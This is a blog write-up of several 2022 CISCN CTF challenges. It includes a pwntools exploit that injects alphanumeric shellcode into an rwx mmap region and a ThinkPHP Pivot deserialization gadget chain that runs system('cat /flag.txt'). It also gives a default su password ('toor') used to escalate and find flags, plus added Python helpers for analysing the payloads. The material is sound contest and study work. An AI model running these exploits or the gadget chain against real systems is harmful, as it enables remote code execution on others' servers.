2022 CISCN National CTF: partial writeups

I'll skip my reflections on this competition; I'm a crypto player, hahaha. No need to be afraid of scoring zero in a contest. Here I'll briefly record the crypto challenges I took with unintended solutions (maybe everyone was doing it the unintended way)... no, I did them in trusted computing, hhhhh. Then I'll record the pwn and web ones.

PWN

login:
Oh well, this one was simple, but I stared at the parameters for ages; I'm just bad. Put the parameters together and it works. Crying; otherwise I could have taken a first blood (or maybe not).
The mmap region has permission 7 (rwx), so it is executable: build the parameters and fire them straight in. Use alpha to generate printable-character shellcode.
exp:

from pwn import *

#p=remote('47.93.83.221',28093)   # remote instance used during the contest
p=process("./login")
# step 1: opt:1 is the login step, msg:ro0t is the credential; opt and msg are
# sent together in one CRLF-separated blob, which is what the "parameters" were about
p.sendlineafter(">>> ",'opt:1\r\nmsg:ro0t\r\n')

# x64 alphanumeric shellcode produced with alpha; msg lands in the rwx
# (permission 7) mmap region, so every byte has to be printable
sh='Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
# step 2: opt:2 delivers the shellcode as msg
p.sendline('opt:2\r\nmsg:'+sh+'\r\n')
p.interactive()

The exp is tiny; I spent ages working out the parameters. Still too bad at this.
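Three checks a practitioner would want around that exp, as an added Python example that is not part of the original writeup: spotting the rwx (permission 7) mapping in a /proc/<pid>/maps dump, vetting that a shellcode blob contains only alphanumeric bytes (the filter is an assumption; the writeup only says the payload had to be printable, hence alpha), and framing requests exactly the way the exp does. The maps excerpt is constructed, not captured from the real binary.

```python
"""Added checks around the login exploit: spot the rwx mapping, vet the
shellcode charset, and frame requests the way the exp does."""
import re
import string

ALNUM = frozenset(string.ascii_letters + string.digits)

# One /proc/<pid>/maps line: "start-end perms offset dev inode [path]".
# A region mapped with PROT_READ|PROT_WRITE|PROT_EXEC (= 7) shows perms "rwx".
_MAPS_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) ([rwxps-]{4}) ")


def find_wx_mappings(maps_text: str) -> list:
    """Return (start, end, path) for every mapping that is both writable and executable."""
    hits = []
    for line in maps_text.splitlines():
        m = _MAPS_RE.match(line)
        if not m:
            continue
        perms = m.group(3)
        if "w" in perms and "x" in perms:
            fields = line.split(None, 5)
            path = fields[5] if len(fields) > 5 else ""
            hits.append((int(m.group(1), 16), int(m.group(2), 16), path))
    return hits


def bad_chars(shellcode: bytes) -> set:
    """Bytes an alphanumeric-only filter would reject. The filter is assumed here;
    the writeup only says the payload had to be printable, hence the alpha encoder."""
    return {b for b in shellcode if chr(b) not in ALNUM}


def build_request(opt: int, msg: str) -> bytes:
    """Frame one request as the exp sends it: opt and msg in one CRLF-separated blob."""
    return f"opt:{opt}\r\nmsg:{msg}\r\n".encode()


# Constructed maps excerpt (not captured from the real binary): one anonymous rwx
# page of the kind mmap(..., PROT 7, ...) produces, next to ordinary mappings.
MAPS_SAMPLE = """\
00400000-00401000 r--p 00000000 08:01 123 /tmp/login
00401000-00402000 r-xp 00001000 08:01 123 /tmp/login
7f1234567000-7f1234568000 rwxp 00000000 00:00 0
7ffd12345000-7ffd12366000 rw-p 00000000 00:00 0 [stack]
"""

# The alpha-encoded shellcode from the exp above.
ALPHA_SHELLCODE = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"

if __name__ == "__main__":
    print(find_wx_mappings(MAPS_SAMPLE))
    print(bad_chars(ALPHA_SHELLCODE.encode()))   # empty set: every byte is alphanumeric
    print(bad_chars(b"H1\xc0\x0f\x05"))          # raw xor rax,rax / syscall bytes would be rejected
    print(build_request(2, ALPHA_SHELLCODE)[:24])
```

The second `bad_chars` call is the point of alpha: a plain `syscall` (0x0f 0x05) can never pass a printable filter, so the encoder has to rebuild those bytes at run time inside the rwx page.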

Web
There is a similar, documented vulnerability for this challenge online; just take the PoC and fire it (the one below is the think\Model / think\model\Pivot deserialization chain). The source the organizers gave takes its parameter via POST, so make sure you send it via POST.
exp:

<?php
// ThinkPHP Model deserialization chain: a think\model\Pivot whose __destruct()
// (lazySave) leads into save(), and whose attribute getter ends up calling
// withAttr['whoami'] = system on data['whoami'] = 'cat /flag.txt'.
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;                          // __destruct() calls save() when lazySave is set
            $this->data = ['whoami' => ['cat /flag.txt']];   // argument handed to the callback below
            $this->exists = True;                            // take the update path inside save()
            $this->table = $obj;                             // inner Pivot: string conversion triggers __toString()/toArray()
            $this->withAttr = ['whoami' => ['system']];      // attribute getter callback
            $this->json = ['whoami',['whoami']];             // route 'whoami' through the JSON attribute getter
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    // outer Pivot carries the gadget, inner Pivot is its $table; base64 keeps the
    // NUL bytes of the private/protected property names intact in the POST body
    echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}
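The gadget above only works if the serialized blob reaches unserialize() intact, and the private/protected property names it relies on are mangled with NUL bytes, which is why the exp base64-encodes it. The following is an added Python example of my own (not part of the original writeup or of ThinkPHP): a small reader for the unserialize() text format that parses a constructed payload of the same shape as the Pivot gadget, shows how lazySave/data/table/withAttr are mangled, counts the NUL bytes, and pairs each withAttr callback with its argument. The sample bytes are hand-built for the example, not the contest payload.

```python
"""Minimal PHP unserialize() reader, added to inspect Model gadgets like the one above."""
import base64
from dataclasses import dataclass, field


@dataclass
class PHPObject:
    cls: str
    props: dict = field(default_factory=dict)       # property name -> value
    visibility: dict = field(default_factory=dict)  # property name -> public/protected/private


def _prop_name(raw: str):
    # PHP mangles non-public names in serialize() output:
    #   "\0*\0name"     -> protected
    #   "\0Class\0name" -> private (declaring class embedded)
    if raw.startswith("\0*\0"):
        return "protected", raw[3:]
    if raw.startswith("\0"):
        _, _owner, name = raw.split("\0", 2)
        return "private", name
    return "public", raw


def php_unserialize(data: bytes):
    """Parse the subset a POP-chain payload uses: N, b, i, s, a (array) and O (object)."""
    pos = 0

    def read_int(sep: bytes) -> int:
        nonlocal pos
        end = data.index(sep, pos)
        value = int(data[pos:end])
        pos = end + 1            # consume the separator
        return value

    def read_str(n: int) -> str:
        nonlocal pos
        value = data[pos + 1:pos + 1 + n].decode("latin-1")   # skip opening quote
        pos += n + 2             # opening quote, n bytes, closing quote
        return value

    def parse():
        nonlocal pos
        tag = data[pos:pos + 1]
        pos += 2                 # type letter plus ':' (or ';' for N)
        if tag == b"N":
            return None
        if tag == b"b":
            return read_int(b";") == 1
        if tag == b"i":
            return read_int(b";")
        if tag == b"s":
            value = read_str(read_int(b":"))
            pos += 1             # ';'
            return value
        if tag == b"a":
            count = read_int(b":")
            pos += 1             # '{'
            arr = {}
            for _ in range(count):
                key = parse()
                arr[key] = parse()
            pos += 1             # '}'
            return arr
        if tag == b"O":
            obj = PHPObject(read_str(read_int(b":")))
            pos += 1             # ':' before the property count
            count = read_int(b":")
            pos += 1             # '{'
            for _ in range(count):
                vis, name = _prop_name(parse())
                obj.visibility[name] = vis
                obj.props[name] = parse()
            pos += 1             # '}'
            return obj
        raise ValueError(f"unsupported tag {tag!r} at offset {pos - 2}")

    return parse()


def encode_payload(data: bytes) -> str:
    """Base64, as the exp does, so the NUL bytes in mangled names travel intact in a POST parameter."""
    return base64.b64encode(data).decode()


def decode_payload(b64: str) -> PHPObject:
    return php_unserialize(base64.b64decode(b64))


def nul_count(data: bytes) -> int:
    return data.count(b"\0")


def describe_chain(obj: PHPObject) -> dict:
    """Pair each withAttr callback with the data value it will receive: attr -> (callable, argument)."""
    data = obj.props.get("data", {})
    calls = {attr: (cb[0], data.get(attr, {0: None})[0])
             for attr, cb in obj.props.get("withAttr", {}).items()}
    return {"class": obj.cls, "lazySave": obj.props.get("lazySave"), "calls": calls}


# Constructed sample (not the contest payload): same shape as the Pivot gadget above,
# with table nested as a second Pivot like the original.
SAMPLE = (
    b'O:17:"think\\model\\Pivot":4:{'
    b's:21:"\x00think\\Model\x00lazySave";b:1;'
    b's:17:"\x00think\\Model\x00data";a:1:{s:6:"whoami";a:1:{i:0;s:13:"cat /flag.txt";}}'
    b's:8:"\x00*\x00table";O:17:"think\\model\\Pivot":0:{}'
    b's:21:"\x00think\\Model\x00withAttr";a:1:{s:6:"whoami";a:1:{i:0;s:6:"system";}}'
    b'}'
)

if __name__ == "__main__":
    obj = decode_payload(encode_payload(SAMPLE))
    print(obj.visibility)
    print(describe_chain(obj))
    print("NUL bytes in raw payload:", nul_count(SAMPLE))
```

Running the reader over the real exp's output is the same call: decode the base64 the PHP script prints, then `describe_chain` shows which callable will run on which string before you send anything.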

Crypto
Oh well, here come the unintended solutions, damn it. Here I'm a crypto player plain and simple, hhhh
Challenge-code-based mutual authentication:
ssh into the server and escalate privileges; the su password is toor. Privilege escalation succeeded here, hhhh
find / -name "flag*"
Screenshots omitted..... da da
Challenge-code-based mutual authentication 2:
ssh into the server and escalate privileges; the su password is toor. Privilege escalation succeeded here, hhhh
find / -name "flag*"
Screenshots omitted..... da da
Challenge-code-based mutual authentication 3:
ssh into the server and escalate privileges; the su password is toor. Privilege escalation succeeded here, hhhh
find / -name "flag*"
Screenshots omitted..... da da

Hilarious. Three crypto challenges solved; I can do unintended solutions too.

Summary: the regrettable part is that I didn't look at pwn3. pwn3 is a UAF; even though it is libc 2.34, you can just overwrite the exit hook with a one_gadget. Sigh, I didn't look at that one, otherwise I could have solved it too....

Link to this post:

http://azly.top/index.php/archives/60/